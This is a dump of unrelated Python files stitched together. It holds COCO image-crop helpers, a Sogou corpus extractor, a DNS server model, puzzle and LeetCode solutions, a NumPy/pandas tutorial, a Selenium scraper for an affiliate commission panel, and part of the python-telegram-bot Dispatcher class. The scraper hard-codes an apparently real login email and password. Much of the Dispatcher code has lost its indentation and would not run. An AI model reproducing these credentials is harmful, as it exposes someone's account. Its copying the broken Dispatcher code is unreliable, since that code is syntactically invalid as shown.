    axes.add_collection(fill)
    # solid outline drawn on top
    outline = PatchCollection(polygons, facecolor='none', edgecolors=colors, linewidths=2)
    axes.add_collection(outline)
def pairwise_group(alt_seg):
    """Group a flat [x0, y0, x1, y1, ...] sequence into (x, y) tuples.

    Args:
        alt_seg (array-like): even-length sequence of alternating coordinates

    Returns:
        list of (x, y) tuples in their original order
    """
    assert len(alt_seg) % 2 == 0
    # pair every even-index element with the odd-index element after it
    return list(zip(alt_seg[0::2], alt_seg[1::2]))
def getBboxImgXY(img, ann, margin=0.2):
    """Crop a square sub-image around the annotated object's bounding box.

    The crop is a square of side max(width, height) * (1 + margin),
    centered on the bbox and clipped to the image bounds.

    Args:
        img (np.array): original image
        ann (dict): a Coco-style annotation with a 'bbox' entry
        margin (float): fractional padding, 0 <= margin < 1

    Returns:
        (crop, x_lo, y_lo): the cropped sub-image and the minimal x and y
        coordinates of the crop in the original image.
    """
    assert 0 <= margin < 1.0, "Margin is out of band!"
    x0, y0, width, height = ann['bbox']
    side = max(width, height) * (1 + margin)
    cx = x0 + width/2
    cy = y0 + height/2
    # clip the square window to the image and floor to pixel indices
    x_lo = int(max(cx - side/2, 0))
    x_hi = int(min(cx + side/2, img.shape[1]))
    y_lo = int(max(cy - side/2, 0))
    y_hi = int(min(cy + side/2, img.shape[0]))
    bboxImg = np.copy(img[y_lo:y_hi, x_lo:x_hi])
    return bboxImg, x_lo, y_lo
def getPgonsBboxImgsColorsAltSegs(img, anns, polygons):
    """Build per-object crops plus polygons/colors/segmentations in crop coordinates.

    Args:
        img (np.array): original image
        anns (array): Coco annotations for the objects
        polygons (array): matplotlib Polygons in original-image coordinates

    Returns:
        pgons (array): matplotlib Polygons translated into crop coordinates
        bboxImgs (array): one bounding-box crop per annotation
        colors (array): per-polygon display colors
        alt_segs (array): segmentation coordinates relative to each crop
    """
    assert len(anns) == len(polygons)
    pgons, bboxImgs, colors, alt_segs = [], [], [], []
    for ann in anns:
        bboxImg, x0, y0 = getBboxImgXY(img, ann)
        bboxImgs.append(bboxImg)
        # one random pastel color per annotation; drawn unconditionally so
        # the random sequence does not depend on the segmentation type
        c = (np.random.random((1, 3))*0.6+0.4).tolist()[0]
        # only polygon-style (list) segmentations are handled
        if 'segmentation' not in ann or type(ann['segmentation']) != list:
            continue
        # shift every (x, y) coordinate into crop space
        alt_seg = np.copy(ann['segmentation'])
        for seg in alt_seg:
            for k in range(len(seg)):
                shift = x0 if k % 2 == 0 else y0
                seg[k] = int(seg[k] - shift)
        alt_segs.append(alt_seg)
        seg_pgons, seg_colors = [], []
        for seg in alt_seg:
            poly = np.array(seg).reshape((int(len(seg)/2), 2))
            seg_pgons.append(Polygon(poly))
            seg_colors.append(c)
        pgons.append(seg_pgons)
        colors.append(seg_colors)
    return pgons, bboxImgs, colors, alt_segs
def getPolygonsLabelsMasksColorsBboxImgs(coco, img, anns):
    """Collect polygons, labels, crop-space segmentations, colors and crops for an image.

    Args:
        coco (COCO object): COCO API handle for the dataset split in use
        img (np.array): image to process
        anns (array): annotations for the image; entries without a
            polygon-style segmentation are removed from this list IN PLACE

    Returns:
        pgons, object_labels, alt_segs, colors, bboxImgs (see
        getPgonsBboxImgsColorsAltSegs for the first/last four)
    """
    polygons, object_labels = [], []
    without_polygons = []  # annotations lacking a polygon segmentation
    for ann in anns:
        # unused draw kept so downstream color sampling sees the same
        # random sequence (one draw per annotation happens here too)
        c = (np.random.random((1, 3))*0.6+0.4).tolist()[0]
        if 'segmentation' in ann and type(ann['segmentation']) == list:
            # label info: (category id, category name)
            cat_info = coco.loadCats(ann['category_id'])[0]
            object_labels.append((cat_info['id'], cat_info['name']))
            # one matplotlib Polygon per segmentation part
            polys = [Polygon(np.array(seg).reshape((int(len(seg)/2), 2)))
                     for seg in ann['segmentation']]
            polygons.append(polys)
        else:
            without_polygons.append(ann)
    for ann in without_polygons:
        anns.remove(ann)
    pgons, bboxImgs, colors, alt_segs = getPgonsBboxImgsColorsAltSegs(img, anns, polygons)
    return pgons, object_labels, alt_segs, colors, bboxImgs
# Get categories with largest number of images to use
def get_largest_categories(coco, num_categories):
    """Pick the num_categories COCO categories with the most images.

    Args:
        coco (COCO object): COCO API handle for the dataset split in use
        num_categories (int): how many of the largest categories to return

    Returns:
        list of category dicts, e.g.
        {'supercategory': 'person', 'id': 1, 'name': 'person'}
    """
    # (catId, number of images) for every candidate category id
    img_per_category = [(i, len(coco.getImgIds(catIds=i))) for i in range(90)]
    img_per_category.sort(key=lambda x: x[1])
    usedCatImgs = img_per_category[-num_categories:]  # list of (catId, numImgs) tuples
    # fix: dropped the unused local that previously held the smallest image
    # count of the selected categories
    used_ids = [tup[0] for tup in usedCatImgs]  # list of catIds used
    used_categories = coco.loadCats(coco.getCatIds(catIds=used_ids))
    cat_names = [cat['name'] for cat in used_categories]
    print('{} COCO categories used: \n{}\n'.format(
        len(used_categories), ' '.join(cat_names)))
    return used_categories
class CocoImage():
    """Container for one object crop extracted from a COCO image.

    Attributes:
        data: bounding-box subimage (np.array) of the object.
        label: (category_id, category_name) tuple for the object.
        config: (bboxImg, polygons, color) tuple, usable as show_gt_mask(*config).
        polygon: Shapely polygon of the ground-truth segmentation, in
            bbox-image coordinates.
    """

    def __init__(self, image, label, config, polygon):
        self.data = image
        self.label = label
        self.config = config
        self.polygon = polygon

    @staticmethod
    def preprocess(coco, directory, all_img_info, used_ids, filter_fn=lambda x: True):
        """Build one CocoImage per kept object segment.

        Args:
            coco: pycocotools COCO object for the dataset split in use.
            directory: directory holding the image files.
            all_img_info: list of COCO image-info dicts to process.
            used_ids: category ids whose annotations are kept.
            filter_fn: predicate on the bbox subimage; crops for which it
                returns False are dropped.

        Returns:
            list of CocoImage objects for each object segment"""
        all_coco_imgs = []
        for img_info in all_img_info:
            I = io.imread(os.path.join(directory, img_info["file_name"]))
            # Get obj seg/bbox annotations of img
            annIds = coco.getAnnIds(
                imgIds=img_info['id'], catIds=used_ids, iscrowd=None)
            anns = coco.loadAnns(annIds)
            all_subimage_data = getPolygonsLabelsMasksColorsBboxImgs(coco, I, anns)
            # All five parallel lists must describe the same set of objects.
            assert all(len(ret) == len(all_subimage_data[0]) for ret in all_subimage_data)
            polygons, object_labels, alt_segs, colors, bboxImgs = all_subimage_data
            # In order to call show_gt_mask(*config)
            configs = list(zip(bboxImgs, polygons, colors))
            # In order to check which points are in the Shapely Polygon later
            shapelyPolygons = [Pgon(pairwise_group(seg[0])) for seg in alt_segs]
            all_coco_imgs += [CocoImage(*args) for args in
                              zip(bboxImgs, object_labels, configs, shapelyPolygons)
                              if filter_fn(args[0])]
        return all_coco_imgs
# @staticmethod
# def _preprocess(coco, img_path, img_info, used_ids):
# """Process images into a form that can be input into Keras Models.
# Args:
# coco (COCO object): coco object of portion of the coco dataset used
# img_imnfo (dict): image to preprocess
# used_ids (array): array of ints indicating which classes of coco are being used
# Returns:
# TODO(rliaw): Should return 1 CocoImage with multiple attributes.
# bboxImgs (array): array of bounding box images for each object in the image
# object_labels (array): labels for each object in bboxImgs
# configs (array): configs for ground truth segmentation for each object
# i.e. each config in configs is used like: show_gt_mask(*config)
# shapelyPolygons (array): Shapely Polygons of the ground truth segmentation for each object
# """
# I = io.imread(img_path)
# # Get obj seg/bbox annotations of img
# annIds = coco.getAnnIds(imgIds=img_info['id'], catIds=used_ids, iscrowd=None)
# anns = coco.loadAnns(annIds)
# polygons, object_labels, alt_segs, colors, bboxImgs = getPolygonsLabelsMasksColorsBboxImgs(coco, I, anns)
# x = len(polygons)
# assert len(object_labels) == x, (x, len(object_labels))
# assert len(alt_segs) == x, (x, len(alt_segs))
# assert len(colors) == x, (x, len(colors))
# assert len(bboxImgs) == x, (x, len(bboxImgs))
# # In order to call show_gt_mask(*config)
# configs = []
# for i in range(len(polygons)):
# configs.append((bboxImgs[i], polygons[i], colors[i]))
# # In order to check which points are in the Shapely Polygon later
# shapelyPolygons = []
# for seg in alt_segs:
# shapelyPolygons.append(Pgon(pairwise_group(seg[0])))
# assert len(configs) == len(shapelyPolygons)
# return bboxImgs, object_labels, configs, shapelyPolygons |
# -*- coding: utf-8 -*-
"""
参考链接:
python初步实现word2vec:http://blog.csdn.net/xiaoquantouer/article/details/53583980
Google Word2vec 学习手札: http://blog.csdn.net/MebiuW/article/details/52295138
"""
import sys
import chardet
import re

# Path to the Sogou news corpus dump (GB2312-encoded XML fragments).
text_path = "/Users/sunlu/Documents/数据集/搜狗实验室/搜狐新闻数据(SogouCS)/news_sohusite_xml.smarty.dat"

# <content>...</content> blocks hold the article text.
# Compile once instead of on every line (the old code recompiled per line,
# used Python-2-only `print item`, and never closed either file).
CONTENT_RE = re.compile(r'<content>(.*?)</content>')

with open(text_path, 'r', encoding='gb2312', errors='ignore') as source, \
        open("news_sohusite.txt", 'w', encoding='utf-8') as sink:
    for line in source:
        for item in CONTENT_RE.findall(line):
            print(item)
            # Skip fragments shorter than 4 characters (mostly empty tags).
            if len(item) >= 4:
                sink.write(item + '\n')
|
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# DNSServer model
# ---------------------------------------------------------------------
# Copyright (C) 2007-2013 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Django modules
from django.utils.translation import ugettext_lazy as _
from django.db import models
# NOC modules
from noc.core.model.fields import INETField, DocumentReferenceField
from noc.main.models.sync import Sync
class DNSServer(models.Model):
    """
    DNS Server is a database object representing a real DNS server.

    :param name: Unique DNS server name (usually, FQDN)
    :param ip: Server's IP address
    :param description: Optional description
    :param sync: Optional reference to the Sync document used as the
        synchronization channel for this server
    """
    class Meta:
        verbose_name = _("DNS Server")
        verbose_name_plural = _("DNS Servers")
        db_table = "dns_dnsserver"
        app_label = "dns"

    # FQDN (or other unique label) identifying the server
    name = models.CharField(_("Name"), max_length=64, unique=True)
    # Address is optional: a server may be known by name only
    ip = INETField(_("IP"), null=True, blank=True)
    description = models.CharField(_("Description"), max_length=128,
                                   blank=True, null=True)
    # Reference to the synchronization channel (noc.main.models.sync.Sync)
    sync = DocumentReferenceField(Sync, blank=True, null=True)

    def __unicode__(self):
        return self.name
|
from utils import read_input
import math
# Puzzle input: one arithmetic expression (string) per line (AoC 2020 day 18).
raw = read_input.read_input_strings('day18')
def evaluate_precedence(expression):
    """Evaluate a flat expression where '+' binds tighter than '*'.

    The expression is split on '*'; each factor is a '+'-joined group whose
    integer terms are summed, and the factor sums are multiplied together.
    """
    product = 1
    for group in expression.split('*'):
        product *= sum(int(term) for term in group.split('+'))
    return product
def evaluate_sequential(expression):
    """Evaluate a flat (parenthesis-free) expression strictly left to right.

    '+' and '*' have equal precedence; digits between operators are buffered
    and folded into the running result when the next operator (or the end of
    the string) is reached.

    Args:
        expression (str): digits, '+' and '*' only, no spaces.

    Returns:
        int: the left-to-right evaluation result.
    """
    result = 0
    operator = '+'
    digits = []

    def _apply_pending():
        # Fold the buffered number into the result using the pending operator.
        # (This de-duplicates the apply logic that previously appeared twice.)
        nonlocal result
        value = int(''.join(digits))
        result = result + value if operator == '+' else result * value
        digits.clear()

    for char in expression:
        if char == '+' or char == '*':
            _apply_pending()
            operator = char
        else:
            digits.append(char)
    # Fold the trailing number, if any.
    if digits:
        _apply_pending()
    return result
def evaluate(expression, reduce):
    """Recursively collapse parenthesized groups, then apply *reduce*.

    Each innermost (...) group is evaluated first and replaced by its value;
    once the expression is flat, it is handed to the *reduce* callable.
    """
    flat = expression.replace(' ', '')
    if '(' not in flat:
        return reduce(flat)

    pieces = []
    index = 0
    length = len(flat)
    while index < length:
        char = flat[index]
        if char != '(':
            pieces.append(char)
            index += 1
            continue
        # Scan forward to the matching close parenthesis.
        depth = 1
        scan = index + 1
        while scan < length:
            if flat[scan] == '(':
                depth += 1
            if flat[scan] == ')':
                depth -= 1
                if depth == 0:
                    break
            scan += 1
        # Evaluate the group and splice its value back in as text.
        pieces.append(str(evaluate(flat[index + 1:scan], reduce)))
        index = scan + 1
    return evaluate(''.join(pieces), reduce)
def part_one():
    """Solve part 1: evaluate each input line left to right, then sum."""
    total = sum(evaluate(line, evaluate_sequential) for line in raw)
    print(f'The summary of all expressions is {total}.')
def part_two():
    """Solve part 2: evaluate with '+' before '*', then sum."""
    total = sum(evaluate(line, evaluate_precedence) for line in raw)
    print(f'The summary of all expressions is {total}.')
if __name__ == '__main__':
    # Run both puzzle parts when executed as a script.
    part_one()
    part_two()
|
## Goal: get the thread that is top 100 popular: by views, by replies
## Write function to sort by reviews or replies
## .csv file to contain: link_to_thread, name_of_thread, views, replies, last_post_time, last_post_date
import time
import datetime as dt
import pandas as pd
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait, Select
def init_driver():
    """Create a maximized Chrome driver with a 3-second explicit-wait helper."""
    chrome = webdriver.Chrome()
    chrome.maximize_window()
    # Attach the wait helper so callers can do driver.wait.until(...).
    chrome.wait = WebDriverWait(chrome, 3)
    return chrome
def lookup_commissions(driver, sd, ed):
    """Log in to the Affiliatly panel and scrape the per-day summary table.

    Args:
        driver: a Selenium WebDriver (see init_driver()).
        sd (str): start date, 'MM/DD/YYYY'.
        ed (str): end date, 'MM/DD/YYYY'.

    Returns:
        dict of column-name -> list of cell text, one entry per table row.
    """
    # Log in first.
    # SECURITY NOTE: credentials are hard-coded; move them to environment
    # variables or a config file before sharing this script.
    driver.get('https://www.affiliatly.com/af-102171/affiliate.panel')
    user = driver.find_element_by_xpath("//input[@name='email']")
    password = driver.find_element_by_xpath("//input[@name='password']")
    user.clear()
    user.send_keys("mwolla@verticalscope.com")
    password.clear()
    password.send_keys("Vscope700!")
    driver.find_element_by_xpath("//button[@name='login']").click()

    # Fill both date pickers via JS (the widgets reject plain send_keys).
    # BUG FIX: a stray driver.execute_script(sd, ...) call that executed the
    # date string itself as JavaScript has been removed.
    datepicker_from = driver.find_element_by_xpath("//input[@name='date_from']")
    driver.execute_script("arguments[0].value='"+sd+"';", datepicker_from)
    print('from', datepicker_from.get_attribute('value'))
    datepicker_to = driver.find_element_by_xpath("//input[@name='date_to']")
    driver.execute_script("arguments[0].value='"+ed+"';", datepicker_to)
    print('now', datepicker_to.get_attribute('value'))

    # Show the summary table for the selected range.
    driver.find_element_by_xpath(
        "//button[@class='btn btn-success show_summary_data']").click()

    # Scrape the table: one cell lookup per row instead of re-querying the
    # whole table for every column (the old code also built an unused `cols`).
    post_dict = {'date': [], 'visitors': [], 'order': [], 'earnings': [],
                 'conversions': []}
    table = driver.find_element_by_xpath('//div[@class="table_responsive_holder"]')
    rows = table.find_elements_by_tag_name('tr')
    columns = ('date', 'visitors', 'order', 'earnings', 'conversions')
    for row in rows[1:]:  # rows[0] is the header
        cells = row.find_elements_by_tag_name('td')
        for key, cell in zip(columns, cells):
            post_dict[key].append(cell.text)
    print(post_dict)
    return post_dict
def process_df(post_dict):
    """Normalize the scraped commission table in place.

    Converts 'date' to datetimes, strips the '$' from 'earnings' and casts it
    to float, and casts 'visitors' to float.

    Args:
        post_dict (pd.DataFrame): frame with string columns as scraped by
            lookup_commissions().

    Returns:
        pd.DataFrame: the same frame with typed columns.
    """
    post_dict['date'] = pd.to_datetime(post_dict['date'])
    # BUG FIX: the old code read a non-existent 'commission' column; the
    # scraper produces 'earnings'. regex=False keeps '$' a literal character.
    post_dict['earnings'] = (post_dict['earnings']
                             .str.replace('$', '', regex=False)
                             .astype(float))
    post_dict['visitors'] = post_dict['visitors'].astype(float)
    return post_dict
if __name__ == '__main__':
    driver = init_driver()
    # Report window: the 65 days ending yesterday, formatted for the panel.
    ed = (dt.datetime.now() - dt.timedelta(days=1))
    sd = (ed - dt.timedelta(days=65)).strftime('%m/%d/%Y')
    ed = ed.strftime('%m/%d/%Y')
    print('sd', sd)
    print('ed', ed)
    order_data = lookup_commissions(driver, sd, ed)
    # NOTE(review): 'site' is a scalar while the other keys hold lists;
    # confirm DataFrame.from_dict accepts this mix for your pandas version.
    order_data['site'] = 'thesleepjudge.com'
    print(order_data)
    order_data = pd.DataFrame.from_dict(order_data)
    order_data = process_df(order_data)
    # NOTE(review): sorted_order is computed but the unsorted order_data is
    # what gets written below — confirm which one should land in the CSV.
    sorted_order = order_data.sort_values('date', ascending=False)
    order_data.to_csv('commission.csv')
    driver.close()
class Solution:
    def kthSmallest(self, matrix: list[list[int]], k: int) -> int:
        """Return the k-th smallest value in a row- and column-sorted matrix.

        Binary-searches on the *value* range [matrix[0][0], matrix[-1][-1]];
        for each candidate, counts entries <= candidate with a staircase walk
        from the bottom-left corner (O(rows + cols) per probe).

        Fix: the original annotated parameters with `List`, which was never
        imported; builtin generics (PEP 585) need no import.
        """
        left = matrix[0][0]
        right = matrix[-1][-1]
        while left < right:
            middle = (left + right) // 2
            # Staircase count of entries <= middle, starting bottom-left.
            i = len(matrix) - 1
            j = count = 0
            while i >= 0 and j < len(matrix[0]):
                if matrix[i][j] <= middle:
                    # Everything above (i+1 entries) in this column also fits.
                    j += 1
                    count += i + 1
                else:
                    i -= 1
            if count >= k:
                right = middle  # answer is <= middle
            else:
                left = middle + 1  # answer is > middle
        return left
|
from graphene import relay
from graphene_sqlalchemy import SQLAlchemyObjectType
from crm.apps.organization.models import Organization
class OrganizationType(SQLAlchemyObjectType):
    class Meta:
        # Expose the Organization SQLAlchemy model through graphene.
        model = Organization
        # Implement the Relay Node interface (global IDs, node() queries).
        interfaces = (relay.Node,)
        # GraphQL type name mirrors the model class name ("Organization").
        name = model.__name__
|
"""
Udemy "Interactive Python Dashboards with Plotly and Dash Course
10/25/2020
"""
import numpy as np
# NumPy crash course.
# --- NumPy crash course: arrays, ranges, random numbers, reshaping, masks ---
mylist = [1, 2, 3, 4, 5, 6, 7]
print(np.array(mylist))
print(type(mylist))
# makes an array out of a list.
arr = np.array(mylist)
print(arr)
print(type(arr))
a = np.arange(0, 10)
print(a)
# range of numbers with a step of 2.
b = np.arange(0, 20, 2)
print(b)
# matrix or grid array of numbers; the shape is passed as a tuple (5,5).
print(np.zeros((5,5)))
print(np.ones((3,5)))
# both literals below are floats.
print(type(1.0))
print(type(1.))
# create a single random integer in [0, 100).
print(np.random.randint(0,100))
# pass a shape tuple to get a (7,7) grid of random integers.
print(np.random.randint(0,100,(7,7)))
# evenly spaced numbers from 0 to 10 inclusive; third argument is how many.
print(np.linspace(0,10,6))
print(np.linspace(0,10,101))
print(np.linspace(0,10,201))
# seed the generator to reproduce the same random numbers on every run.
np.random.seed(101)
print(np.random.randint(0,100,10))
# produce a random array of 10 integers in [0, 200).
array = np.random.randint(0,200,10)
print(array)
# summary statistics of the array.
print(array.max())
print(array.min())
print(array.mean())
# index (not value) of the max/min element.
print(array.argmax())
print(array.argmin())
# make an array of numbers 0 to 99.
mat = np.arange(0,100)
print(mat)
# reshape into a 10x10 matrix.
matrix = mat.reshape(10,10)
print(matrix)
# shortcut to the two lines above:
# mat = np.arange(0,100).reshape(10,10)
# index a single element: row first, then column (zero-based).
print(matrix[5,2])
# slice a whole column (column 2).
print(matrix[:,2])
# slice a whole row (row 2).
print(matrix[2,:])
# masking: element-wise comparison yields a boolean matrix...
print(matrix > 50)
# ...which selects only the values greater than 50 (flattened).
print(matrix[matrix>50])


# --- Pandas crash course: reading, selecting, filtering, summarizing ---
import pandas as pd

df = pd.read_csv('salaries.csv')
print(df)
# print just the Salary column.
print(df['Salary'])
# print two columns by passing a list of names, hence the double brackets.
print(df[['Name','Salary']])
# aggregate a column, e.g. .min(), .max(), .mean().
print(df['Salary'].mean())
# conditional filtering: the comparison yields a boolean Series...
print(df['Age'] > 30)
# ...which selects the matching rows (Age > 30).
ser_of_bool = df['Age'] > 30
print(df[ser_of_bool])
# the same filter in one step.
print(df[df['Age'] > 30])
# other methods:
# distinct values in a column.
print(df['Age'].unique())
# count of distinct values.
print(df['Age'].nunique())
# column labels.
print(df.columns)
# dtypes and non-null counts.
print(df.info())
# statistical summary of numeric columns.
print(df.describe())
# index info.
print(df.index)

# Combined NumPy + pandas exercise: build a frame from a reshaped array.
mat1 = np.arange(0,10).reshape(5,2)
print(mat1)
df1 = pd.DataFrame(data=mat1,columns=['2019','2020'],index=['JAN','FEB','MAR','APR','MAY'])
print(df1)
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2016
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the Dispatcher class."""
import logging
from functools import wraps
from inspect import getargspec
from threading import Thread, BoundedSemaphore, Lock, Event, current_thread
from re import match, split
from time import sleep
from telegram import (TelegramError, Update, NullHandler)
from telegram.updatequeue import Empty
# Attach a do-nothing handler so library users who have not configured
# logging do not see "No handlers could be found" warnings.
H = NullHandler()
logging.getLogger(__name__).addHandler(H)

# Shared async-pool state used by run_async(): `semaphore` caps the number of
# concurrently running handler threads (lazily sized by the first Dispatcher),
# and `async_threads` tracks the live threads, guarded by `async_lock`.
semaphore = None
async_threads = set()
""":type: set[Thread]"""
async_lock = Lock()
def run_async(func):
    """
    Function decorator that will run the function in a new thread. A function
    decorated with this will have to include **kwargs in their parameter list,
    which will contain all optional parameters.

    Args:
        func (function): The function to run in the thread.

    Returns:
        function: wrapper that starts the (pool-limited) thread and returns it.
    """
    # TODO: handle exception in async threads
    #       set a threading.Event to notify caller thread

    @wraps(func)
    def pooled(*pargs, **kwargs):
        """
        A wrapper to run a thread in a thread pool
        """
        result = func(*pargs, **kwargs)
        # Free the pool slot and drop this thread from the bookkeeping set.
        semaphore.release()
        with async_lock:
            async_threads.remove(current_thread())
        return result

    @wraps(func)
    def async_func(*pargs, **kwargs):
        """
        A wrapper to run a function in a thread
        """
        # NOTE: the varargs name 'pargs' is load-bearing —
        # Dispatcher.call_handler detects async handlers by checking
        # getargspec(handler).varargs == 'pargs'. Do not rename it.
        thread = Thread(target=pooled, args=pargs, kwargs=kwargs)
        semaphore.acquire()  # may block until a pool slot frees up
        with async_lock:
            async_threads.add(thread)
        thread.start()
        return thread

    return async_func
class Dispatcher:
"""
This class dispatches all kinds of updates to its registered handlers.
A handler is a function that usually takes the following parameters
bot:
The telegram.Bot instance that received the message
update:
The update that should be handled by the handler
Error handlers take an additional parameter
error:
The TelegramError instance that was raised during processing the
update
All handlers, except error handlers, can also request more information by
appending one or more of the following arguments in their argument list for
convenience
update_queue:
The Queue instance which contains all new updates and is
processed by the Dispatcher. Be careful with this - you might
create an infinite loop.
args:
If the update is an instance str or telegram.Update, this will be
a list that contains the content of the message split on spaces,
except the first word (usually the command).
Example: '/add item1 item2 item3' -> ['item1', 'item2', 'item3']
For updates that contain inline queries, they will contain the
whole query split on spaces.
For other updates, args will be None
    In some cases handlers may need some context data to process the update. To
    do that, simply put the update into the queue with
    update_queue.put(update, context=context) or call
    processUpdate(update, context=context) directly.
context:
Extra data for handling updates.
For regex-based handlers, you can also request information about the match.
For all other handlers, these will be None
groups:
A tuple that contains the result of
re.match(matcher, ...).groups()
groupdict:
A dictionary that contains the result of
re.match(matcher, ...).groupdict()
Args:
bot (telegram.Bot): The bot object that should be passed to the
handlers
update_queue (telegram.UpdateQueue): The synchronized queue that will
contain the updates.
"""
    def __init__(self, bot, update_queue, workers=4, exception_event=None):
        """
        Args:
            bot (telegram.Bot): bot instance passed as first argument to all
                handlers.
            update_queue (telegram.UpdateQueue): queue this dispatcher drains.
            workers (int): size of the shared async-handler thread pool
                (only honored by the first Dispatcher created).
            exception_event (threading.Event): optional event signalled when
                another thread died with an exception.
        """
        self.bot = bot
        self.update_queue = update_queue
        # Handler registries: lists for broadcast handlers, dicts keyed by
        # command string / regex matcher / type for targeted dispatch.
        self.telegram_message_handlers = []
        self.telegram_inline_handlers = []
        self.telegram_command_handlers = {}
        self.telegram_regex_handlers = {}
        self.string_regex_handlers = {}
        self.string_command_handlers = {}
        self.type_handlers = {}
        self.unknown_telegram_command_handlers = []
        self.unknown_string_command_handlers = []
        self.error_handlers = []
        self.logger = logging.getLogger(__name__)
        self.running = False
        self.__stop_event = Event()
        self.__exception_event = exception_event or Event()

        global semaphore
        # The async thread-pool semaphore is module-global: it is shared by
        # all dispatchers and sized only by the first one created.
        if not semaphore:
            semaphore = BoundedSemaphore(value=workers)
        else:
            self.logger.info("Semaphore already initialized, skipping.")
def start(self):
"""
Thread target of thread 'dispatcher'. Runs in background and processes
the update queue.
"""
if self.running:
self.logger.warning('already running')
return
if self.__exception_event.is_set():
msg = 'reusing dispatcher after exception event is forbidden'
self.logger.error(msg)
raise TelegramError(msg)
self.running = True
self.logger.info('Dispatcher started')
while 1:
try:
# Pop update from update queue.
update, context = self.update_queue.get(True, 1, True)
except Empty:
if self.__stop_event.is_set():
self.logger.info('orderly stopping')
break
elif self.__stop_event.is_set():
self.logger.critical(
'stopping due to exception in another thread')
break
continue
try:
self.processUpdate(update, context)
self.logger.debug('Processed Update: %s with context %s'
% (update, context))
# Dispatch any errors
except TelegramError as te:
self.logger.warn("Error was raised while processing Update.")
try:
self.dispatchError(update, te)
# Log errors in error handlers
except:
self.logger.exception("An uncaught error was raised while "
"handling the error")
# All other errors should not stop the thread, just print them
except:
self.logger.exception("An uncaught error was raised while "
"processing an update")
self.running = False
self.logger.info('Dispatcher thread stopped')
def stop(self):
"""
Stops the thread
"""
if self.running:
self.__stop_event.set()
while self.running:
sleep(0.1)
self.__stop_event.clear()
    def processUpdate(self, update, context=None):
        """
        Processes a single update by routing it to every matching handler
        family (type handlers, string commands/regexes, Telegram
        commands/messages/inline queries, polling errors). An update that
        matches nothing is turned into an error dispatch.

        Args:
            update (any): the update to route.
            context (any): optional extra data forwarded to handlers.
        """
        handled = False

        # Custom type handlers
        for t in self.type_handlers:
            if isinstance(update, t):
                self.dispatchType(update, context)
                handled = True

        # string update
        if type(update) is str and update.startswith('/'):
            self.dispatchStringCommand(update, context)
            handled = True
        elif type(update) is str:
            self.dispatchRegex(update, context)
            handled = True

        # An error happened while polling
        if isinstance(update, TelegramError):
            self.dispatchError(None, update)
            handled = True

        # Telegram update (regex)
        if isinstance(update, Update) and update.message is not None:
            self.dispatchRegex(update, context)
            handled = True

            # Telegram update (command)
            # NOTE(review): update.message.text may be None for non-text
            # messages (photos, stickers, ...), which would raise here —
            # confirm upstream guarantees text is set.
            if update.message.text.startswith('/'):
                self.dispatchTelegramCommand(update, context)

            # Telegram update (message)
            else:
                self.dispatchTelegramMessage(update, context)
            handled = True
        elif isinstance(update, Update) and \
                (update.inline_query is not None or
                 update.chosen_inline_result is not None):
            self.dispatchTelegramInline(update, context)
            handled = True

        # Update not recognized
        if not handled:
            self.dispatchError(update, TelegramError(
                "Received update of unknown type %s" % type(update)))
# Add Handlers
def addTelegramMessageHandler(self, handler):
"""
Registers a message handler in the Dispatcher.
Args:
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
self.telegram_message_handlers.append(handler)
def addTelegramInlineHandler(self, handler):
"""
Registers an inline query handler in the Dispatcher.
Args:
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
self.telegram_inline_handlers.append(handler)
def addTelegramCommandHandler(self, command, handler):
"""
Registers a command handler in the Dispatcher.
Args:
command (str): The command keyword that this handler should be
listening to.
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
if command not in self.telegram_command_handlers:
self.telegram_command_handlers[command] = []
self.telegram_command_handlers[command].append(handler)
def addTelegramRegexHandler(self, matcher, handler):
"""
Registers a regex handler in the Dispatcher. If handlers will be
called if re.match(matcher, update.message.text) is True.
Args:
matcher (str/__Regex): A regex string or compiled regex object that
matches on messages that handler should be listening to
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
if matcher not in self.telegram_regex_handlers:
self.telegram_regex_handlers[matcher] = []
self.telegram_regex_handlers[matcher].append(handler)
def addStringCommandHandler(self, command, handler):
"""
Registers a string-command handler in the Dispatcher.
Args:
command (str): The command keyword that this handler should be
listening to.
handler (function): A function that takes (Bot, str, *args) as
arguments.
"""
if command not in self.string_command_handlers:
self.string_command_handlers[command] = []
self.string_command_handlers[command].append(handler)
def addStringRegexHandler(self, matcher, handler):
"""
Registers a regex handler in the Dispatcher. If handlers will be
called if re.match(matcher, string) is True.
Args:
matcher (str/__Regex): A regex string or compiled regex object that
matches on the string input that handler should be listening to
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
if matcher not in self.string_regex_handlers:
self.string_regex_handlers[matcher] = []
self.string_regex_handlers[matcher].append(handler)
def addUnknownTelegramCommandHandler(self, handler):
"""
Registers a command handler in the Dispatcher, that will receive all
commands that have no associated handler.
Args:
handler (function): A function that takes (Bot, Update, *args) as
arguments.
"""
self.unknown_telegram_command_handlers.append(handler)
def addUnknownStringCommandHandler(self, handler):
"""
Registers a string-command handler in the Dispatcher, that will
receive all commands that have no associated handler.
Args:
handler (function): A function that takes (Bot, str, *args) as
arguments.
"""
self.unknown_string_command_handlers.append(handler)
def addErrorHandler(self, handler):
"""
Registers an error handler in the Dispatcher.
Args:
handler (function): A function that takes (Bot, TelegramError) as
arguments.
"""
self.error_handlers.append(handler)
def addTypeHandler(self, the_type, handler):
"""
Registers a type handler in the Dispatcher. This allows you to send
any type of object into the update queue.
Args:
the_type (type): The type this handler should listen to
handler (function): A function that takes (Bot, type, *args) as
arguments.
"""
if the_type not in self.type_handlers:
self.type_handlers[the_type] = []
self.type_handlers[the_type].append(handler)
# Remove Handlers
